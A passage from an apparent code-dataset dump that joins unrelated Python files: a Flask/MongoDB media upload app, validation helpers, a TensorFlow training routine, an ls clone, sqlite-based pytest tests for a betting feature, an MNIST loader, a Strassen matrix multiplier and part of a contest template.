methods=['GET', 'POST'])\ndef insertMODEL():\n form = InsertImgForm()\n if request.method == 'POST' and form.validate_on_submit():\n model = request.files['model']\n objecthash, extension = be.workOnObj(model, store_type)\n\n # Prepare metadata\n metadata={}\n metadata['title'] = request.form['title']\n metadata['description'] = request.form['description']\n metadata['author'] = request.form['author']\n metadata['project'] = request.form['project']\n metadata['year'] = request.form['year']\n metadata['license_url'] = request.form['license_url']\n metadata['extension'] = extension \n metadata['coordinates'] = {}\n coord = request.form['coordinates']\n sepcoord = coord.split(',')\n metadata['coordinates']['latitude'] = sepcoord[0]\n metadata['coordinates']['longitude'] = sepcoord[1]\n\n ## Prepare paradata\n # paradata = {}\n # paradata['unitMeas'] = request.form['unitMeas'] \n # paradata['hasSubModels'] = request.form['hasSubModels']\n # paradata['hasHotspots'] = request.form['hasHotspots']\n ## change it to paradata!!\n metadata['objtype'] = '3dmodel'\n metadata['filename'] = model.filename\n metadata['objecthash'] = objecthash\n metadata['store_type'] = store_type\n\n\n ## Create doc\n # doc = {}\n # doc['metadata'] = metadata\n # doc['paradata'] = paradata\n ## Remember to upload doc instead of metadata!!\n be.upload2mongo(metadata,'models')\n return render_template('uploadDone.html')\n return render_template('uploadObj.html',form=form, obj='3D Model')\n\n@app.route('/insertIMG', methods=['GET', 'POST'])\ndef insertIMG():\n form = InsertImgForm()\n if request.method == 'POST' and form.validate_on_submit():\n# img = request.files['img']\n img = form.img.data\n objecthash, extension = be.workOnObj(img, store_type)\n\n # Prepare metadata\n metadata={}\n metadata['title'] = request.form['title']\n metadata['description'] = request.form['description']\n metadata['author'] = request.form['author']\n metadata['project'] = request.form['project']\n metadata['objtype'] = 'image'\n metadata['year'] = request.form['year']\n metadata['license_url'] = request.form['license_url']\n metadata['extension'] = extension\n metadata['filename'] = img.filename\n metadata['objecthash'] = objecthash\n metadata['store_type'] = store_type\n metadata['coordinates'] = {}\n coord = request.form['coordinates']\n sepcoord = coord.split(',')\n metadata['coordinates']['latitude'] = sepcoord[0]\n metadata['coordinates']['longitude'] = sepcoord[1]\n be.upload2mongo(metadata,'imgs')\n return render_template('uploadDone.html')\n return render_template('uploadObj.html',form=form, obj='Image')\n\n\n@app.route('/getInventory')\ndef getInventory():\n inventory = be.connect2mongo(be.loadConf(),'inventory')\n res = inventory.find()\n return render_template('inventory.html', result=res)\n\n@app.route('/searchOption')\ndef searchOption():\n return render_template('searchOption.html')\n\n@app.route('/search',methods=['GET', 'POST'])\ndef search():\n form = searchForm(request.form)\n coll = request.args.get('coll', None)\n obj = request.args.get('obj', None)\n if request.method == 'POST' and form.validate_on_submit(): \n collection = be.connect2mongo(be.loadConf(), coll)\n query = request.form['query']\n res = collection.find({'$text':{'$search':query}})\n if coll=='inventory':\n return render_template('inventory.html', result=res)\n return render_template('result.html', result=res)\n return render_template('search.html', form=form, obj=obj) \n\n# @app.route('/searchPUB',methods=['GET', 'POST'])\n# def searchPUB():\n# form = 
SearchPubForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# pubs = be.connect2mongo(be.loadConf(),'pubs')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('ResultPUB.html',result=pubs.find({'title':request.form['title']}))\n# return render_template('searchPUB.html',form=form)\n\n# @app.route('/searchIMG',methods=['GET', 'POST'])\n# def searchIMG():\n# form = SearchImgForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# imgs = be.connect2mongo(be.loadConf(),'imgs')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('ResultIMG.html',result=imgs.find({'title':request.form['title']}))\n# return render_template('searchIMG.html',form=form)\n\n# @app.route('/searchModel',methods=['GET', 'POST'])\n# def searchModel():\n# form = SearchModelForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# models = be.connect2mongo(be.loadConf(),'models')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('ResultIMG.html',result=models.find({'title':request.form['title']}))\n# return render_template('searchModel.html',form=form)\n\n# @app.route('/searchInventory',methods=['GET', 'POST'])\n# def searchInventory():\n# form = SearchInventoryForm(request.form)\n# if form.validate_on_submit(): #request.method=GET o POST?\n# inv = be.connect2mongo(be.loadConf(),'inventory')\n# metadata={}\n# metadata['title'] = request.form['title']\n# return render_template('inventory.html',result=inv.find({'title':request.form['title']}))\n# return render_template('searchInventory.html',form=form)\n\n@app.route('/getImg')\ndef getImg():\n imgs = be.connect2mongo(be.loadConf(),'imgs')\n ID = request.args.get('ID', None)\n img = imgs.find_one({'_id': ObjectId(ID)})\n c = be.loadConf()\n return render_template('getImg.html', img=img, c=c['datastore'])\n\n@app.route('/getObj')\ndef getObj():\n objs = be.connect2mongo(be.loadConf(),'models')\n ID = request.args.get('ID', None)\n obj = objs.find_one({'_id': ObjectId(ID)})\n return render_template('getObj.html', obj=obj)\n\n@app.route('/testImgForm',methods=['GET', 'POST'])\ndef testFORM():\n form = testImgForm()\n if request.method == 'POST' and form.validate_on_submit():\n \n f = form.photo.data\n # f = request.files['photo']\n # filename = secure_filename(f.filename)\n objecthash, extension = be.workOnObj(f, store_type)\n return render_template('uploadDone.html')\n return render_template('testForm.html',form=form)\n@app.route('/testPubForm',methods=['GET', 'POST'])\ndef testPubFORM():\n form = testPubForm()\n if request.method == 'POST' and form.validate_on_submit():\n pub=form.pub.data\n objecthash, extension = be.workOnObj(pub, store_type)\n\n # Prepare metadata\n metadata={}\n \n asset = {}\n asset['title'] = request.form['title']\n asset['description'] = request.form['description']\n asset['authorship'] = request.form['authorship']\n asset['coordinates'] = {}\n asset['coordinates']['latitude'] = None\n asset['coordinates']['longitude'] = None\n asset['license'] = request.form['license']\n metadata['asset'] = asset\n project = {}\n project['name'] = request.form['project_name']\n project['year'] = request.form['project_year']\n project['url'] = request.form['project_url']\n project['partners'] = request.form['project_partners']\n metadata['project'] = project\n\n objectdata = {}\n objectdata['filename'] = pub.filename\n objectdata['type'] = 'publication'\n objectdata['extension'] = 
extension\n        objectdata['hash'] = objecthash\n        storedata = {}\n        storedata['type'] = store_type\n\n        doc = {}\n        doc['metadata'] = metadata\n        doc['objectdata'] = objectdata\n        doc['storedata'] = storedata\n\n\n        be.upload2mongo(doc,'pubs')\n        return render_template('uploadDone.html')\n    return render_template('testPubForm.html',form=form)\n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":10558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600283057","text":"def check_cell_info(cell_obj):\n    '''\n    Function to validate a cell info object before it is allowed into the\n    database\n\n    Args:\n        cell_obj: an instance of the Cell_info model class\n\n    Returns:\n        errs: a string describing the error\n            (empty if none)\n    '''\n    def check_time(time_str,errs):\n        '''\n        Function to parse and validate a time string\n\n        Args:\n            time_str: the time string\n            errs: a list containing strings describing the errors\n\n        Returns:\n            hr: an int describing the hour\n                00 if not valid\n            mn: an int describing the minutes\n                00 if not valid\n            errs: a list with any new errors appended\n\n        '''\n\n        if len(time_str)!=5:\n            errs.append('Time values must be 5 characters long i.e. HH:MM')\n        col=time_str.index(':')\n        if col!=2:\n            errs.append('The third character of time values must be\\\n                a colon i.e. HH:MM')\n\n        hr_str=time_str[:col]\n        if not hr_str.isdigit():\n            errs.append('the first two characters of time values must be digits')\n            hr='00'\n        else:\n            hr=int(hr_str)\n            if hr>23:\n                errs.append('hour values must be less than 24')\n\n        mn_str=time_str[col+1:]\n        if not mn_str.isdigit():\n            errs.append('the last two characters of time values must be digits')\n            mn='00'\n        else:\n            mn=int(mn_str)\n            if mn>59:\n                errs.append('minute values must be less than 60')\n\n        return [hr, mn, errs]\n\n    errs=[]\n    #check takt\n    print('checking cell')\n    if type(cell_obj.takt)==str:\n        if not cell_obj.takt.isdigit():\n            errs.append('takt must be an integer')\n\n    hrs=[]\n    mns=[]\n    #check all times\n    for shift in cell_obj.shifts:\n        [start_hr, start_mn, errs] = check_time(shift['start'],errs)\n        hrs.append(start_hr)\n        mns.append(start_mn)\n        for brk in shift['breaks']:\n            [start_hr, start_mn, errs] = check_time(brk[0],errs)\n            hrs.append(start_hr)\n            mns.append(start_mn)\n            [end_hr, end_mn, errs] = check_time(brk[1],errs)\n            hrs.append(end_hr)\n            mns.append(end_mn)\n        [start_hr, start_mn, errs] = check_time(shift['end'],errs)\n\n    if len(errs)<1:\n        failed=False\n        for i in range(1,len(hrs)):\n            #correct crossing midnight\n            same_hr=hrs[i]==hrs[0] and mns[i]'.join(errs)\n\n\ndef check_ignore(usr_str):\n    '''function to check the string submitted by the user for the tools to\n    ignore, should be in 'T1,T2,T3' format\n\n    Args:\n        usr_str: a string that the user put into the form\n\n    Returns:\n        scrubbed: a scrubbed string safe to enter into the db\n    '''\n\n    usr_list=usr_str.split(',')\n\n    output_list=[]\n    for item in usr_list:\n        tool_num=''\n        for char in item:\n            if char.isdigit():\n                tool_num+=char\n        if len(tool_num)>0:\n            output_list.append('T'+tool_num)\n\n    scrubbed=','.join(output_list)\n\n    return scrubbed\n\n\nif __name__=='__main__':\n    print(check_ignore('T1,T2,T3'))\n    print(check_ignore('t1,t2,t3'))\n    print(check_ignore('tool1, tool2, tool3'))\n    print(check_ignore('this is 4 times the junk'))\n    print(check_ignore('db984fg7rnht 7hn 
2'))\n","sub_path":"app/util_funcs.py","file_name":"util_funcs.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402652381","text":"from imports import *\nfrom scripts.dataset.dataset_functions import *\nfrom scripts.processing.shared_processing_functions import *\nfrom scripts.processing.processing_streamlined import *\nfrom scripts.training.shared_model_functions import *\n\n\n\n''' The following functions are only used by the streamlined version of the pipeline (using tf.data.Dataset) '''\n\n\n\ndef preprocess_data_and_train_model(app):\n\n try: \n\n # print the user-selected processing and training parameters\n print_processing_selections(app)\n print_training_selections(app)\n\n\n # get train, validation, test files\n train_files, val_files, test_files = split_datasets(app)\n print('----------------------------- Done preparing datasets! -----------------------------', '\\n\\n')\n\n\n\n # locally define important dataset and model parameters\n all_labels = get_all_labels(app)\n batch_size = int(app.batch_size_scale.get())\n epoch_num = int(app.epochs_scale.get())\n model_architecture = app.selected_model_architecture.get()\n\n \n print('-------------------------- Defining dataset preprocessing --------------------------', '\\n\\n')\n # get feature and label arrays for each of the file splits\n train_dataset = preprocess_files(train_files, app, all_labels)\n val_dataset = preprocess_files(val_files, app, all_labels)\n test_dataset = preprocess_files(test_files, app, all_labels)\n app.data_for_full_int = preprocess_files(train_files, app, all_labels, representative = True)\n\n # batch the datasets above\n train_dataset_batched = train_dataset.batch(batch_size)\n val_dataset_batched = val_dataset.batch(batch_size)\n test_dataset_batched = test_dataset.batch(batch_size)\n\n\n\n \n print('--------------------------- Checking a training example ---------------------------', '\\n\\n')\n # get an example from the training data to extract the input_shape\n # also define the reshape_shape as well as the number of classes\n # print('train_dataset.take(1): ', train_dataset.take(1))\n for example_feature_map, example_label in train_dataset.take(1):\n continue\n example_feature_map = example_feature_map.numpy()\n input_shape = example_feature_map.shape\n # reshape_shape_without_extra_axis = get_reshape_shape(app)\n # reshape_shape = reshape_shape_without_extra_axis + (1,)\n num_of_classes = len(all_labels)\n\n # print important parameters\n print('example_feature_map: ', example_feature_map)\n print('example_feature_map.shape: ', example_feature_map.shape)\n print('example_label: ', example_label)\n print('example_label.shape: ', example_label.shape, '\\n')\n print('input_shape: ', input_shape)\n # print('reshape_shape: ', reshape_shape)\n print('num_of_classes: ', num_of_classes, '\\n')\n\n # plot an example feature map\n # actually breaks the code later during training\n # plot_example_feature_map(example_feature_map, reshape_shape_without_extra_axis)\n\n\n print('------------------------ Starting compilation and training ------------------------', '\\n\\n')\n # create and compile first model\n model = create_and_compile_model(model_architecture = model_architecture,\n input_shape = input_shape,\n num_of_classes = num_of_classes,\n quantization_aware = False)\n\n # train\n model.fit(train_dataset_batched,\n validation_data = val_dataset_batched,\n epochs = epoch_num,\n callbacks = 
create_callback_list(app))\n\n # evaluate and print test accuracy\n evaluate_print_test_acc(app, model, test_dataset_batched)\n\n\n\n\n app.menu_label.configure(text = \"Retraining for quantization...\")\n quantization_aware_model = create_and_compile_model(model_architecture = model_architecture,\n input_shape = input_shape,\n num_of_classes = num_of_classes,\n quantization_aware = True)\n\n # train again\n quantization_aware_model.fit(train_dataset_batched,\n validation_data = val_dataset_batched,\n epochs = epoch_num,\n callbacks = create_callback_list(app, model_checkpoint=False))\n\n # evaluate and print test accuracy\n evaluate_print_test_acc(app, quantization_aware_model, test_dataset_batched)\n\n # delete the weights saved by the first model, since they have been loaded into\n # the quantization aware model at the start of training and are no longer needed\n os.remove('best_model_weights.h5')\n\n\n\n app.menu_label.configure(text = \"Done training!\")\n model = quantization_aware_model\n app.model = model\n \n except Exception as exception:\n app.menu_label.configure(text = str(exception))","sub_path":"scripts/training/training_streamlined.py","file_name":"training_streamlined.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"126686703","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom time import localtime, strftime\nimport locale \n\n#DONE: ordering! \n#DONE: dymamic orderlist <--\n#DONE: /ls.py /home -s /var doesn't works <-- \n#TODO: total counters\n#TODO: add file, set in path \n#TODO .isoformat instead of strftime \n#TODO: exception handling\n#TODO: symlinks processing\n\ndef parse_args():\n parser = argparse.ArgumentParser(description = 'ls utility analog in python3')\n# parser.add_argument('path', nargs='*', default=['./'], help='path to directory to list')\n parser.add_argument('--hidden', '-H', action='store_true', help='show hidden files [default: off]')\n parser.add_argument('--modified', '-m', action='store_true', help='show modification time [default: off]')\n parser.add_argument('--recursive', '-r', action='store_true', help='recurse into directories [default: off]')\n parser.add_argument('--size', '-s', action='store_true', help='show size [default: off]')\n choices=['m', 'n', 's', 'modified', 'name','size']\n parser.add_argument('--order', '-o', choices=choices, default='n', help='set output order: ' + ', '.join(choices) + '. 
Default: n')\n return parser.parse_known_args()\n\ndef get_file_info(file_name):\n stat_info = os.stat(file_name)\n size = stat_info.st_size\n mtime = strftime('%Y-%m-%d %H:%M:%S', localtime(stat_info.st_mtime))\n return file_name, size, mtime\n \ndef get_format(args):\n format = ''\n m_format = '{1:<12n}'\n if args.modified:\n format += '{2} '\n m_format = '{1:>12} '\n if args.size:\n format += m_format\n format += '{0}'\n return format\n \ndef print_file_name(fmt, fname, size, mtime):\n print(fmt.format(fname, size, mtime)) \n \ndef get_recursive_entries(top, args):\n entries = []\n for root, dirs, files in os.walk(top):\n if not args.hidden:\n dirs[:] = [dir for dir in dirs if not dir.startswith('.')]\n files = [file for file in files if not file.startswith('.')]\n for file in files:\n name = os.path.join(root, file)\n entries.append(get_file_info(name))\n return entries\n\ndef get_flat_entries(dir, args):\n entries = []\n for entry in os.listdir(dir):\n if args.hidden or not entry.startswith('.'):\n name = os.path.join(dir, entry)\n entries.append(get_file_info(name))\n return entries\n\ndef print_total(dirs_num, files_num):\n dirs_str = 'directory' if dirs_num == 1 else 'directories'\n files_str = 'file' if files_num == 1 else 'files'\n print()\n print('{0} {1}, {2} {3}'.format(dirs_num, dirs_str, files_num, files_str))\n print()\n\ndef print_entries(args, entries):\n sort_key = None\n if args.order.startswith('m'):\n sort_key = lambda entry: entry[2]\n elif args.order.startswith('s'):\n sort_key = lambda entry: entry[1]\n dirs_num = 0\n fmt = get_format(args)\n for entry in sorted(entries, key=sort_key):\n dirs_num = dirs_num + 1 if os.path.isdir(entry[0]) else dirs_num\n print_file_name(fmt, *entry)\n print_total(dirs_num, len(entries) - dirs_num)\n \ndef main():\n locale.setlocale(locale.LC_ALL, '')\n args, directories = parse_args()\n entries = []\n for directory in directories:\n if args.recursive:\n entries += get_recursive_entries(directory, args)\n else:\n entries += get_flat_entries(directory, args)\n print_entries(args, entries)\n \nif __name__ == '__main__':\n main()","sub_path":"py_book/tasks/ls/ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560991355","text":"import pytest\nimport sqlite3\nimport database as db\nimport credentials as cr\nimport trade as tr\nimport betting as bt\nimport datetime as dt\nfrom datetime import date, timedelta\nimport time\nimport bcrypt\nimport os\n\n# Setup testdb, first remove existing copies\ndef pytest_setup():\n\n\n if os.path.isfile('testdb.db'):\n os.remove('testdb.db') \n db.dbPath = os.path.abspath('testdb.db')\n cr.dbPath = os.path.abspath('testdb.db')\n tr.dbPath = os.path.abspath('testdb.db')\n bt.dbPath = os.path.abspath('testdb.db')\n\n db.initialise()\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email3 = 'test3@gmail.com'\n email5 = 'test5@gmail.com'\n email6 = 'test6@gmail.com'\n hashed1 = bcrypt.hashpw(b'password1', bcrypt.gensalt()).decode()\n hashed2 = bcrypt.hashpw(b'password2', bcrypt.gensalt()).decode()\n hashed3 = bcrypt.hashpw(b'password3', bcrypt.gensalt()).decode()\n\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email1, hashed1, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, 
capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email2, hashed2, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email3, hashed3, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 10000, \\'{}\\', \\'{}\\')'.format(email5, hashed3, 'q', 'a')\n cur.execute(sql)\n sql = 'INSERT INTO account (email, password, capital, secQ, secA) VALUES (\\'{}\\', \\'{}\\', 1, \\'{}\\', \\'{}\\')'.format(email6, hashed3, 'q', 'a')\n cur.execute(sql)\n\n conn.commit()\n conn.close()\n\n user_id1 = tr.getUserId(email1)\n user_id2 = tr.getUserId(email2)\n user_id3 = tr.getUserId(email3)\n user_id5 = tr.getUserId(email5)\n\n today = dt.date.today()\n start_date = today + timedelta(days = -10)\n start_date2 = today + timedelta(days = -20)\n start_date3 = today + timedelta(days = -2)\n start_date = time.mktime(start_date.timetuple())\n start_date2 = time.mktime(start_date2.timetuple())\n start_date3 = time.mktime(start_date3.timetuple())\n\n\n conn = sqlite3.connect('testdb.db')\n cur = conn.cursor()\n sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 1, 0, \\'{}\\', 10)'.format(user_id1, start_date)\n cur.execute(sql)\n\n sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 0, 0, \\'{}\\', 10)'.format(user_id2, start_date2)\n cur.execute(sql)\n\n sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 0, 0, \\'{}\\', 10)'.format(user_id5, start_date3)\n cur.execute(sql)\n\n conn.commit()\n conn.close()\n\npytest_setup()\n\ndef test_checkBet():\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n user_id1 = tr.getUserId(email1)\n user_id2 = tr.getUserId(email2)\n user_id3 = 9999\n assert True == bt.checkBet(user_id1)\n assert True == bt.checkBet(user_id2)\n assert False == bt.checkBet(user_id3)\n\ndef test_createBet():\n email1 = 'test@gmail.com'\n email2 = 'test2@gmail.com'\n email3 = 'test3@gmail.com'\n email4 = 'test4@gmail.com'\n email6 = 'test6@gmail.com'\n valid = 'CBA'\n invalid = '111'\n user_id3 = tr.getUserId(email3)\n\n with pytest.raises(Exception, match=r\"Email doesn't exist\"):\n bt.createBet(email4, valid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"Invalid company code\"):\n bt.createBet(email3, invalid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"User has an existing bet running\"):\n bt.createBet(email1, valid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"Not Enough Capital to Start Bet, You don't have enough capital to pay out if you lose\"):\n bt.createBet(email6, valid, 0, 100, 2)\n with pytest.raises(Exception, match=r\"Cannot have empty bet amount\"):\n bt.createBet(email6, valid, 0, 0, 2)\n with pytest.raises(Exception, match=r\"Cannot have a negative bet amount\"):\n bt.createBet(email6, valid, 0, -5, 2)\n with pytest.raises(Exception, match=r\"Cannot have empty bet amount\"):\n bt.createBet(email6, valid, 0, None , 2)\n\n\n bt.createBet(email3, valid, 0, 100, 2)\n assert True == bt.checkBet(user_id3)\n\ndef test_deleteBet():\n email3 = 'test3@gmail.com'\n email4 = 'test4@gmail.com'\n user_id3 = tr.getUserId(email3)\n\n with pytest.raises(Exception, match=r\"Email doesn't exist\"):\n 
bt.deleteBet(email4)\n\n    bt.deleteBet(email3)\n    assert False == bt.checkBet(user_id3)\n\n    with pytest.raises(Exception, match=r\"User does not have a bet\"):\n        bt.deleteBet(email3)\n\ndef test_checkWinLose():\n    email1 = 'test@gmail.com'\n    email2 = 'test2@gmail.com'\n    email5 = 'test5@gmail.com'\n\n    # Assumes that user has a bet\n    # check for a win, return 1\n    assert(bt.checkWinLose(email1) == 1)\n\n    # check for a loss, return 0\n    assert(bt.checkWinLose(email2) == 0)\n\n    # check for an unended bet, return -1\n    assert(bt.checkWinLose(email5) == -1)\n\ndef test_createBetHistoryInvalidEmail():\n    email1 = 'test@gmail.com'\n    email2 = 'test2@gmail.com'\n    email3 = 'test3@gmail.com'\n    email4 = 'test4@gmail.com'\n    valid = 'CBA'\n    invalid = '111'\n    user_id3 = tr.getUserId(email3)\n\n    with pytest.raises(Exception, match=r\"Email doesn't exist\"):\n        bt.createBetHistory(email4)\n\n    assert(bt.createBetHistory(email1))\n    \ndef test_calculateReward(): \n    email1 = 'test@gmail.com'\n    email2 = 'test2@gmail.com'\n    email5 = 'test5@gmail.com'\n\n    assert(bt.calculateReward(email1) == 110)\n    assert(bt.calculateReward(email2) == -200)\n    assert(bt.calculateReward(email5) == 0)\n\ndef test_createBetHistory():\n    pytest_setup()\n    email1 = 'test@gmail.com'\n    email5 = 'test5@gmail.com'\n    user_id5 = tr.getUserId(email5)\n    user_id1 = tr.getUserId(email1)\n    # Call the create bet function for user3\n    # Check a betting that hasn't finished\n\n    #Create a bet that has finished\n    # today = dt.date.today()\n    # start_date = today + timedelta(days = -10)\n    # start_date = time.mktime(start_date.timetuple())\n    # conn = sqlite3.connect('testdb.db')\n    # cur = conn.cursor()\n    # sql = 'INSERT INTO betting (user_id, company_id, bet_amount, growth, start_price, start_date, multiplier) VALUES (\\'{}\\', 115, 10, 1, 0, \\'{}\\', 10)'.format(user_id3, start_date)\n    # cur.execute(sql)\n    # conn.commit()\n    # conn.close()\n\n    # Create a bet_history record that has finished: email1\n    bt.createBetHistory(email1)\n    # Create a bet_history record that hasn't finished: email5\n    bt.createBetHistory(email5)\n\n    #Check both of the bet histories\n    conn = sqlite3.connect('testdb.db')\n    cur = conn.cursor()\n    sql = 'SELECT Bet_id, user_id, company_id, bet_amount, growth, reward, status FROM bet_history WHERE user_id = ' + str(user_id1)\n    cur.execute(sql)\n    res1 = cur.fetchall()\n    sql = 'SELECT Bet_id, user_id, company_id, bet_amount, growth, reward, status FROM bet_history WHERE user_id = ' + str(user_id5)\n    cur.execute(sql)\n    res2 = cur.fetchall()\n    assert(res1 == [(1, 1, 115, 10.0, 1, 110.0, 'active')])\n    assert(res2 == [(2, 4, 115, 10.0, 0, 0.0, 'active')])\n    conn.close()\n\ndef test_updateBetHistory():\n    email5 = 'test5@gmail.com'\n    user_id5 = tr.getUserId(email5)\n    # update email5's bet_history record, it should still be active, updateBetHistory should return false\n    assert(bt.updateBetHistory(email5) == False)\n    # Directly change the unix time to 10 days ago, \n    today = dt.date.today()\n    end_date = today + timedelta(days = -10)\n    end_date = time.mktime(end_date.timetuple())\n    conn = sqlite3.connect('testdb.db')\n    cur = conn.cursor()\n    sql = 'UPDATE bet_history SET end_date = \\'{}\\' WHERE user_id = {} AND status = \\'{}\\''.format(end_date, user_id5, \"active\")\n    cur.execute(sql)\n    conn.commit()\n    conn.close()\n\n    # Call updateBetHistory, it should be updated, changing active status to finished\n\n    assert(bt.updateBetHistory(email5) == True)\n    conn = sqlite3.connect('testdb.db')\n    cur = conn.cursor()\n    sql = 'SELECT status FROM bet_history WHERE user_id = ' + 
str(user_id5)\n    cur.execute(sql)\n    res1 = cur.fetchall()\n    conn.close()\n    assert(res1 == [('finished',)])\n    \n    # Check a user has no active bet running and it is deleted from betting table\n    assert(bt.updateBetHistory(email5) == False)\n    assert(bt.checkBet(user_id5) == False)\n    ","sub_path":"react_app/backend/betting_test.py","file_name":"betting_test.py","file_ext":"py","file_size_in_byte":8797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"460063328","text":"from flask import Flask, render_template, request\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n    if request.method == \"GET\":\n        return render_template(\"index.html\")\n    else:\n        name = request.form.get(\"name\")\n        if not name:\n            return \"Who are you?\"\n        else:\n            return f\"Hello, {name}\"\n\nif __name__ == \"__main__\":\n    app.run()","sub_path":"code_examples/python/standard_libs_http/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"302228992","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 13 14:47:13 2018\n\n@author: maxdh\n\"\"\"\n\n# How to install: pip install python-mnist\n\n#import random\n#import matplotlib.pyplot as plt\n\nimport numpy as np\nfrom PIL import Image\n\nfrom mnist import MNIST\n\ndef load_train_data( folder, zipped=False ):\n    \"load train data of the MNIST database out of the _folder_ folder\"\n    \n    mndata = MNIST(folder)\n    mndata.gz = zipped\n    \n    images, labels = mndata.load_training()\n    \n    return images, labels\n    \ndef load_testing_data( folder, zipped=False ):\n    \"load testing data of the MNIST database out of the _folder_ folder\"\n    \n    mndata = MNIST(folder)\n    mndata.gz = zipped\n    \n    images, labels = mndata.load_testing()\n    \n    return images, labels\n    \n#def print_data_plt( image, xPixel=0, yPixel=0 ):\n#    \"print _image_ with matplotlib; _xPixel_ pixels in x; _yPixel_ pixels in y\"\n#    \n#    pixels = get_pixel_array(image, xPixel, yPixel)\n#    \n#    plt.figure()\n#    plt.imshow(pixels, cmap='gray')\n#    plt.axis('off')\n#    \n#    plt.show()\n#    return\n\ndef save_as_bmp(image, path, xPixel=0, yPixel=0 ):\n    pixels = get_pixel_array(image, xPixel, yPixel)\n    \n    im = Image.fromarray(pixels)\n    \n    im = im.convert(\"RGB\")\n    \n    im.save(path)\n    \ndef get_pixel_array(image, xPixel=0, yPixel=0):\n    pixels = np.array(image, dtype='uint8')\n\n    if (xPixel == 0 or yPixel == 0):\n        buffer = int(np.sqrt(len(pixels)))\n        \n        if (buffer**2 == len(pixels)):\n            xPixel = buffer\n            yPixel = buffer\n        else:\n            print(\"Error: image isn't squared! 
Please set _x_ and _y_ pixel number.\")\n            return\n    \n    pixels = pixels.reshape((xPixel,yPixel))\n    \n    return pixels","sub_path":"lib/DataIO/mnistLib.py","file_name":"mnistLib.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251309518","text":"import numpy as np\n\n\ndef read_matrix(read_size, stored_size):\n    matrix = np.zeros((stored_size, stored_size), dtype=np.int)\n    for i in range(read_size):\n        matrix[i][:read_size] = list(map(int, input().split()))\n    return matrix\n\n\ndef div_matrix(matrix):\n    left, right = np.hsplit(np.array(matrix), 2)\n    m11, m21 = np.vsplit(left, 2)\n    m12, m22 = np.vsplit(right, 2)\n    return m11, m12, m21, m22\n\n\ndef strassen(a, b):\n    if len(a) == 1:\n        return a * b\n\n    a11, a12, a21, a22 = div_matrix(a)\n    b11, b12, b21, b22 = div_matrix(b)\n\n    p1 = strassen(a11 + a22, b11 + b22)\n    p2 = strassen(a21 + a22, b11)\n    p3 = strassen(a11, b12 - b22)\n    p4 = strassen(a22, b21 - b11)\n    p5 = strassen(a11 + a12, b22)\n    p6 = strassen(a21 - a11, b11 + b12)\n    p7 = strassen(a12 - a22, b21 + b22)\n\n    c11 = p1 + p4 - p5 + p7\n    c12 = p3 + p5\n    c21 = p2 + p4\n    c22 = p1 - p2 + p3 + p6\n\n    return np.vstack((np.hstack((c11, c12)),\n                      np.hstack((c21, c22))))\n\n\nsize = int(input())\nextended_size = 1\nwhile extended_size < size:\n    extended_size *= 2\na = read_matrix(size, extended_size)\nb = read_matrix(size, extended_size)\nresult = strassen(a, b)\n\nfor row in result[:size, :size]:\n    print(*row)\n","sub_path":"Paradigm-and-programming-languages/Homework-3/Strassen.py","file_name":"Strassen.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602961523","text":"import sys\nfrom heapq import heappop, heappush\nfrom operator import itemgetter\nfrom collections import deque, defaultdict, Counter\nfrom bisect import bisect_left, bisect_right\ninput = sys.stdin.readline\nsys.setrecursionlimit(10 ** 7)\nMOD = 10**9 + 7\nINF = float('inf')\n\n# if no modulus is needed, set mod=1\n\nclass Combination:\n    def __init__(self, 